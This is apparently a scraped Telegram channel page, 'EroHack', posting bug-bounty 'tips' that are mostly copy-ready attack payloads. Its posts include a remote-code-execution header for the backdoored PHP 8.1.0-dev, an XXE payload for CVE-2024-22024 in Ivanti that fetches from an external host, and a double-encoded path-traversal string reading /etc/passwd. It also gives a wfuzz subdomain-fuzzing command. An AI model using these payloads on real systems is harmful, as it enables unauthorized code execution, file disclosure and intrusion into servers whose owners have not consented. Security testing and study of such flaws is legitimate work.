Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
Find a server running PHP 8.1.0-dev 
💀 Check for easy RCE  💀

🖥 Payload
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7😐1🗿1
💀CVE-2024-22024💀

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>


📺 send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm


#bugbountytips #cve #Ivanti
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5💯3🗿1
💉 LFI Payload 💉

💀Payload💀
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty  #CyberSecurity
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥1💯1
🏔Fuzzing Subdomain with WFUZZ

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👾2💯1